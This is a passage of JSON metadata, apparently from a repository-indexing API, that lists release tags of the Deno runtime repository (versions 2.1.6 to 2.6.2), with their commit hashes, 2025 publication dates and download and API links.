mmit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz